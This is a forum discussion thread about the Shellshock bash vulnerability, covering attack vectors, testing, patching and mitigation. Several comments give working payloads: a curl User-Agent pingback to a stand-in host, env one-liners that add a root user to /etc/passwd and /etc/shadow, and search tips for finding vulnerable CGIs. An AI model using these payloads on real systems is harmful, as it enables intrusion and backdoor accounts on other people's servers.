As an example of who might be impacted, since openssh preserves the original command line passed to the ssh server when authenticating a public key that has a fixed command associated in authorized_keys, GitHub and BitBucket security teams are probably both having a really exciting day.
This vulnerability is the kind of reason I would have a stripped-down OpenSSH for public users, if I were them. Hard-code to do what they need, don't use configuration files, remove any features not needed. For example, to print the "You've successfully authenticated, but GitHub does not provide shell access." a user gets trying to ssh to github.com, don't invoke anything, print it directly from the SSH server.
Maybe. Actually, it looks like Github is using libssh, which is along the lines of what I was thinking, without having to mess with crypto too much, as you say.
I write hundreds of shell scripts per year and I never, ever use bash. Everything can be done with a less complex /bin/sh having only POSIX-like features.
There's no reason webservers have to use bash by default.
Sysadmins might need a hefty shell will lots of features in order to do their work, but an httpd should not need access to bash-isms. It should work fine with a very minimal POSIX-like shell.
I'm glad the systems I use do not have bash installed by default. The only time I ever use it is when a software author tries to force me to use bash by writing their install scripts in it and using bash-isms so the script will not run with a simpler shell like a BSD /bin/sh.
No, it's not printed in your trivial example, but if you replace the simple "echo" command with any bash script, or any executable that calls a bash script, or any executable that invokes another program that calls a bash script, or ... then you're screwed.
Even with the "zsh", this should print "vulnerable":
You don't have to use bash explicitly. It might be called by some application or library. For example, if your default shell is a bash, this will work too:
Right, the point being that bash is vulnerable, not zsh (as was suggested by the post I was replying to). I'm not claiming that using zsh as your interactive shell somehow makes you immune.
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
but failed to spot that the second command invokes bash not zsh.
My tests suggest that neither zsh 4.3.17 or 5.0.6 (the versions that ship with Debian stable & testing respectively) are vulnerable to this exploit - if you replace bash with zsh in the test oneliner then the code after the end of the function definition in the environment variable is not executed.
According to http://wiki.bash-hackers.org/syntax/basicgrammar it appears that this is because bash allows functions to be exported through environment variables into subprocesses, but the code to parse those function definitions seems to be the same used to parse regular commands (and thus execute them).
Edit: after a brief glance over the affected code, this might not be so easy to patch completely - the actual method where everything interesting starts to take place is initialize_shell_variables in variables.c and parse_and_execute() in builtins/evalstring.c, so parsing and execution happen together; this is necessary to implement the shell grammar and is part of what makes it so powerful, but it can also be a source of vulnerabilities if it's not used carefully. I suppose one attempt at fixing this could be to separate out the function parsing code into its own function, one which can't ever cause execution of its input, and use that to parse function definitions in environment variables. This would be a pretty easy and elegant thing to do with a recursive-descent parser, but bash uses a lex/yacc-generated one to consume an entire command at once...
However, all in all I'm not so sure this ability to export funcdefs is such a good idea - forking a subshell automatically inherits the functions in the parent, and if it's a shell that wasn't created in such a manner, if it needs function definitions it can read them itself from some other source. This "feature" also means environment variables cannot start with the string '() {' (and exactly the string '() {' - even removing the space between those characters, e.g. '(){', doesn't trigger it) without causing an error in any subprocess - violating the usual assumption that environment variables can hold any arbitrary string. It might be a rare case, but it's certainly a cause for surprise.
CGI has always been an accident waiting to happen, but hardly anybody uses it anymore anyway, and even more rarely in a manner that invokes bash, of all things.
I fail to see how "HTTP requests" generically are a vector, and its "Here is a sample" statement is not a link and is followed by... nothing.
This article tells me nothing useful other than "don't allow untrusted data into your environment", which we've all known for 20 years.
FastCGI accepts name/value pairs from the server and most default language bindings against it will turn them into environment variables for the benefit of code that expects to be able to reference them. This can get tricky if you do anything that spawns a process with your code later.
Almost all vendor-supplied web interfaces that don't come bundled with a web server are CGI so you can just run it from whatever web server you have. Even some very popular 'appliances' out there that have their own web server run CGI.
Unless you're using CGI, your system environment will not be contaminated. CGI is vulnerable because it relies on passing untrusted data in environment variables. No other gateway interface I'm familiar with does.
Are you certain that no method of invoking a dynamic script sets environment variables to values controlled by requests? If so, it sounds like even an innocent call to system("lame a.wav b.mp3") could lead to code execution.
Edit: also, you may be surprised to find that some "libraries" are actually wrappers around external binaries (e.g. libgpgme). If any of them used a system() or exec() call that preserves environment, and the binary or the library ever invokes bash (e.g. via system()), then trouble will ensue.
If you're using the nginx module, it gets the data from an instance of ngx_http_request_t. From there it gets passed around over sockets. Environment variables are not involved.
Using environment variables for request data would be quite insane when one of your marketing strategies is "fast" -- you'd either have to fork-per-connection just like CGI, or pre-fork processes that take input over a socket, deliberately deserialize it into the environment(!), and use getenv.
However overhyped Passenger might be, I don't know why you'd think the Phusion guys are that crazy.
Discovering that CUPS and dhclient may be vulnerable doesn't change anything. I'm talking about HTTP as an attack vector.
Yeah this is true - a lot of hosting providers run PHP as a CGI as it allows them to run the PHP process under the user account (although it is very slow, and RUID2 is a better solution).
If you're not running mod_cgi can this affect the system in any way?
They would be too slow to be useful at any kind of real load. Are you sure you're not thinking of FastCGI? That doesn't pass data through the environment, it goes over a socket.
Is someone from Heroku online here right now? My apps are all affected and since I am trusting Heroku with this, I am hoping they patch the system as soon as possible.
Its been a bad time for FOSS/Linux systems. Heartbleed, the occasional priv escalation, apt-get, bash, etc. Or whatever the hell happened at TrueCrypt. Or the recent AOSP browser bug in Android that probably won't be patched by any OEM/Carrier. These are all pretty serious issues. Not to mention the endless wave of malware targeting Windows systems, especially the evil cryptolocker ransomware.
I really do think heartbleed was a wake-up call for some people and a lot of extra auditing is being done, perhaps with some healthy paranoia fueled by the recent NSA allegations. Software, in general, imo, is pretty insecure. The exploits, bugs, etc are out there and if you'll find them if you look hard enough. Considering software is always being updated, that also means news bugs and security issues.
As a sysadmin, I've just seen too often how the sausage is made. I have zero illusions about security. There are just too many avenues to compromise, be it via software or via plain-jane social engineering. I think one day in the future we (or our children) are going to look back at the age of viruses and buffer overflows and wonder how the hell we managed to get by, the same way I look at cars from the 50s-60s that suffered from things like vapor lock, were incredibly unsafe, and other issues that really don't exist today.
you're just paying attention. There have been some interesting ones the last year or two but this is really a trickle compared to early through mid 2000s
people started to pay attention. theres a bunch of new vulns being patched daily. if you follow cve's or oss list you can see that.
what's "new" (been done for a few years now) is that there's more marketing drive behind them. Fancy commercial names and websites dedicated and issues are often exaggerated.
Actually super critical vulns are still rare (like HB, codered, etc.)
I tested some of the sites and successfully executed some test code. One can easily google for such sites. The important thing is that, the link using which I ran the code is of a .gov site.
This thing seriously needs to be patched asap. Update your systems now.
This is why I keep coming back to HN. I've gotten an amazing amount of useful info on this very quickly. Great discussion - no trolling, no BS, just serious questions and serious answers.
I'm a bit confused about how to properly patch my mac.
Homebrew installs upgraded bash to /usr/local/bin/bash, everyone says what I should do is run 'chsh -s /usr/local/bin/bash' but if I have a script that has a /bin/bash hashbang at the top, won't it still use the vulnerable bash install?
I mean I guess the answer is "you're probably not hosting a publicly accessible service on your mac, who cares?", which is true in my case, but still.
You're correct – you'd need to overwrite /bin/bash (think long and hard about this) to update it before Apple ships an update.
The good news is that as long as you're not running a local server, the vulnerability is pretty limited particularly since even if you did have SSH enabled the exploit would require valid authentication first.
There's some potentially funky stuff there like CUPS, which runs a local daemon that serves binary CGIs (though I think it's bound to localhost by default).
> Might be wise to turn all network-listening services off that you don't immediately need until a fix is available.
I would go further and suggest that now is an excellent time to ask which of those services you really need to have at all. The default of blocking incoming connections is right for most people, even developers.
At least on linux that's not true as NetworkManager + dhclient is affected through malicious dhcp packets. There could be attack vectors almost everywhere.
My findings so far: setting User-Agent to that new string and executing a .cgi script complains about: syntax error near unexpected token `newline' in `#!/bin/bash'. (My speculation is that we are in some kind of parsing context where no newlines are expected; none are given on the example bash -c ... line, but when you actually run a script there will be a newline).
I tried to change this to a Python script and instead use os.popen. Well, Ubuntu /bin/sh is "dash" so that's not affected.
I tried to explicitly call bash via os.popen("bash -c 'some command'") -- no go either, as that bash command started by parsing some /etc/bash.bashrc file and complaining about newlines there.
Finally I used os.popen("bash --norc -c '/tmp/file date'") -- and that ended up running "date > /tmp/file" from the CGI script.
I tried replacing /bin/sh by "bash" instead of dash. That now made the CGI script choke on reading some other RC files due to the unexpected newlines in the context bash starts with.
So the question from me still seems to be: what is the weird context setup by that environment setup, and what else can do you with it than to redirect $1 to $0 ?
That works for me too. I was first unsure but breaking it up into an export Z=.... and then running bash -c 'echo date' on a separate line seems to execute essentially date > echo.
Can anyone explain what's going on there? Seems like defining a function within a nameless function; how does it end up with this redirect? I'm not sure what the exploitabiliy of this is; is it just essentially $1 > $0 ?
The redirect at the end of the env var seems to be "remembered" even though the syntax error aborts the function definition, then the first arg is taken as the path to redirect to, and the following args as the command to execute. (I haven't dug into the actual parser, this is just my intuitive understanding.) It does seem to be about like $1 > $0, so not generally exploitable.
You may not use data derived from outside your program to affect something
else outside your program--at least, not by accident. All command line
arguments, environment variables, locale information (see perllocale),
results of certain system calls (readdir(), readlink(), the variable
of shmread(), the messages returned by msgrcv(), the password,
gcos and shell fields returned by the getpwxxx() calls), and all
file input are marked as "tainted".
Tainted data may not be used directly or indirectly in any command
that invokes a sub-shell, nor in any command that modifies files,
directories, or processes, with the following exceptions:
It does. I installed an up-to-date version with homebrew a few months ago, and it was vulnerable as well. After a `brew update && brew upgrade bash` I had the fix installed, though :)
My OSX was vulnerable too, but I use Homebrew, and the latest version of bash available via brew update && brew upgrade is patched against this.
If you haven't already been using Homebrew though, you will likely need to move /usr/local/bin infront of /usr/bin in your path, otherwise the old bash would still be used.
I think the default in bash should be to never execute the contents of environment variables (like the restricted shell mode allows). Does anyone know why it allows you to pass in shell functions this way? Does anything use it?
But I'm not sure how a scanner bot would find network accessible bashes to exploit. Seems like basically you need a cgi-bin with bash, and I don't think there's any way to predict a URL that is going to have such a thing.
Now, if there is some popular app that ends up vulnerable (perhaps because it shells out to bash), then that's definitely going to be huge.
You could search for *.cgi scripts indexed by Google. They may not be written IN Bash but maybe one of them opens up a shell to execute a command. Even if you are not explicitly passing any bad data to it, the environment will be passed and trigger this crazy vulnerability.
Gets me ~6k of hits that have just 'sh' in the URL (without the dot), and are not what we're looking for, mostly forum posts asking about how to make a bash cgi-bin. (Answer from the future: don't).
I _think_ putting quotes around the ".sh" is supported to force the result to really have the period before the sh in the url.
It is far worse in the sense that it can lead to remote code execution. However, the number of vulnerable sites is far far fewer. Like Heartblead this one will likely have a very long tail of systems remaining vulnerable. My guess is we will see this vulnerability used to compromise big targets in the next few months.
From just a functionality standpoint, how is even the patched version supposed to work? It seems to undefine the variable:
% E='() { echo hi; }; echo cry' bash -c 'echo "-$E-"'
bash: warning: E: ignoring function definition attempt
bash: error importing function definition for `E'
--
Since everyone's favorite example seems to be CGI scripts, doesn't this result in the script having no variable, as opposed to just a text one? Suddenly the script can break because an expected variable is no longer present simply because the input had a certain odd looking form?
In fact, if I wanted my variable to be a function, why wouldn't I just explicitly eval it? What's the use case at all for this functionality?
I got tired of the hype. How's the following code for a mitigation?
Basically, if some program does invoke /bin/bash, control first passes to this code which truncates suspicious environment variables. (and it dumps messages to the system log if/when it finds anything...)
The check should match for any variety of white space:
=(){
=() {
= ( ) {
etc... but feel free to update it for whatever other stupid things bash allows.
We have added the CVE to our scanning routines and the update is now online on www.detectify.com. Test your environment for unpatched servers. In times like these it's OK to go for our free plan.
We just released a complete quick-test for #shellshock here: https://shellshock.detectify.com/. It's free to use and here's the information about how the scanner works: goo.gl/8vp6eo
Looks like it works. I guess it is okay that after the close quote the command still runs even though it is not terminated
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
I'm by no means an expert, but am I completely wrong if I think something like this should work on an exploitable system to get a pingback from a vulnerable system without curl ?
curl -A "() { :; }; echo GET /pingback.php | telnet bashexploitindexer.fake 80" http://expoitablehost.com/blah.cgi
Can someone with mod_security test a regex I wrote that should mitigate this? /\(.?\)\s\{.?\}\s\;/ from testing seems to catch any variants that I can think of that can trigger this bug, but I don't have a machine easily available to me at the moment to test with, unfortunately.
I have qualms against redhat's fix, because it seems like it would create too many false positives, and additionally looks way too easy to work around just by adding spaces, etc.
Those regexes seem a bit too fragile for my liking. Adding an extra space between the paren and the bracket breaks it, naming the function breaks it, etc. Plus it has a bigger chance of triggering false positives. It's an okay emergency fix, but I'm positive one can do better.
At a glance, one interesting use of this is a potential local privilege escalation on systems with a sudoers file which restrict commands which can be run to ones that include a bash script, and allow you to keep some environment variables.
Also don't use bash for running any scripts. You never should anyway, in a sane environment /bin/sh should not be bash - in Debian/Ubuntu it is dash which is not vulnerable. Unfortunately the Redhat derived distros do use bash as default /bin/sh. In the BSDs it is a standards compliant posix sh too. bash is for users not scripts.
First it encourages people to use bash specific stuff that is non Posix. Second it is a huge bloated bit of code thats ok as user interface, but scripts should use something that is more minimal. To avoid this sort of issue.
/bin/sh is the shell called by system(3) and used by portable scripts bundled with packages. Those things can't use anything but standard sh anyway, so having them run bash is overkill. "Don't use bash as your /bin/sh" isn't the same as "don't use bash as your interactive shell" or "don't write bash scripts"
> In the BSDs it is a standards compliant posix sh too.
In FreeBSD, it is tcsh in sh mode. Bash does the same too when invoked as sh[0]. It's POSIX compliant with extensions. There's still all the shell's code there, it's just that some of it is switched off by default, or its behaviour modified, to be compliant.
I guess I'll answer one part- so if you run this: $ env x='() { :;}; echo vulnerable' bash -c "echo test" in your terminal, you certainly appear to be vulnerable.
But I'm not knowledgable about all the default scripts that launch things on the mac. It's unclear to me if there are any standard processes on OSX that take advantage of Bash
By the time AcceptEnv has any effect, the user is already logged in and can run whatever they want anyway. If you're allowing untrusted users to authenticate to ssh, then, yeah, sure, but you'd be in a niche (and know it).
It can potentially be exploited via anything that shells out to bash with an environment that contains environment variables with values (that ultimately comes from) an untrusted source.
mod_cgi is just one of the most obvious attack vectors.
What I'm really worried about now is every single cable modem and router out there, as they are very rarely updated. They run their shit for years. The bigger routers yes, but smaller ones and the modems not.
Interestingly enough ancient BASH version 3.2 on Mac OS X 10.9.5 is not vulnerable:
$ echo $BASH_VERSION
3.2.51(1)-release
$ x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
$
I manually patched my BASH 4.3 to patch level 25 so it's not vulnerable either.
$ echo $BASH_VERSION
4.3.25(1)-release
$ x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
$
Since other people are reporting that their copies of bash 3.2.51 are vulnerable, I suspect that the version of bash that is currently running in that terminal is 3.2.51 and vulnerable, but the version of bash that you are invoking from that vulnerable version of bash is not.
In other words, I suspect that:
$ echo $BASH_VERSION
and
$ bash --version
Will report different version numbers.
If you start a new terminal and try `echo $BASH_VERSION`, you will probably see a different version as well.
Yes - the shell currently running is probably the user's login shell, and the shell in e.g. /usr/local/bin/bash was probably installed by Homebrew or MacPorts.
That could be the reason. I have renamed /bin/bash version 3.2 to /bin/bash3 and copied /usr/local/bin/bash that I build myself to /bin/bash making effectively bash version 4.3 the default login and system shell.
I started bash 3.2 from bash 4.3 so that could be the reason why it is not vulnerable as child process.
env x='() { :;}; echo "johndoe:x:0:0::/root:/bin/sh" >>/etc/passwd' bash -c "echo this is just a test"
env x='() { :;}; echo "johndoe:\$6\$eM5eLwRC\$eZhb4x7sf1ctGjN1fXrpsusRHRKTHf/E15OA2Nr4TdTF9F0SS4ousy3WrPCI2ofdNoAonRnNPQ7Ja3FQ/:15997:0:99999:7:::" >>/etc/shadow' bash -c "echo this is just a test"
No, all sorts of other network-facing systems can be vulnerable. Anything that ends up shelling out might pass some environment variables causing the problem. These things pop up in surprising places.
I have a feeling this is blown out of proportion.
Who's running bash setuid exactly? Right.
Who's running shell CGIs today? Right.
So.. who has an example of common scripts that are executed remotely in most servers while accepting remote environment? Til then, the panic seems unjustified...
Google brings up 410 .bash CGIs. Every one of them is almost guaranteed to be vulnerable at this point. Of the 1.2 million .sh CGIs, some are surely vulnerable. By this time, many of them are already be in the process of being owned.
CGIs are likely the smallest piece of the vulnerable hosts here. This is going to stick around as a local vulnerability on the plentiful supply of under-patched Linux boxes for a long time.
thats a really small number of servers actually.. i mean ppl get owned every day, every minute.
theres a bunch of more easily exploitable local bugs that actually elevate your privileges.
this one bug DOES NOT elevate privs. you need a service that passes unsanitized env vars (unchecked user input) to bash with another user id than yours.
Even if the malicious code doesn't have superuser context, it can do damage to whatever context it is running under. If it's running as www-data, it can trash all your www-data-owned files. Or send your www-data-owned password files somewhere, etc. Unprivileged code can also attack other systems (firewalls permitting); you don't have to be root on system A, to be part of a bot net which attacks system B. Denial-of-service havok can be wreaked from a regular user context, too. Not to mention privacy violations. Pretty much all browser-related security and privacy issues are user space!
As I understand this, any CGI script could be affected. Even if written in a different language if it turn does an os.system (or equivalent). More info here:
https://securityblog.redhat.com/2014/09/24/bash-specially-cr...
The permissions would only be as the web server user, but that allows all sorts of things to be run that are quite dangerous (resource exhaustion, attacking remote machines, downloading code and running it)
You would still need to be able to pass arbitrary data to the bash command, and if your php (or whatever) script does that, you have a lot of other potential problems to worry about.
Because of the way cgi works you could just set a user agent or other http header to contain an 'rm' or'nc' command or something in to download and run an attack tool. E.g. You could run netcat to listen on a port or connect out to an attacker's system to provide a connection into an otherwise firewalled database server
Yes, you're right. We have perl running on our server, and I just verified that it is vulnerable if any shell scripts are run from perl. However I just quickly switched on modperl, and I verified that it is now not affected. (According to Redhat, mod_perl and php are not affected, but it's good to verify).
You can break the one-liner into two lines to see what is happening.
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!2. Create an innocent sub process. Bash in this case. During initialization...
3. ...bash spots the specially formed variable (named badvar), prints a warning,
4. ...and apparently doesn't define the function at all?
5. But other than that, the child bash runs as expected.
And now the same two input lines on and OLD bash:
1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!2. Create an innocent sub process. Bash in this case. During initialization...
3. ...bash accidentally EXECUTES a snippet that was inside the variable named 'badvar'?!
4. But other than that, the child bash runs as expected. Wow, I should update that machine. :)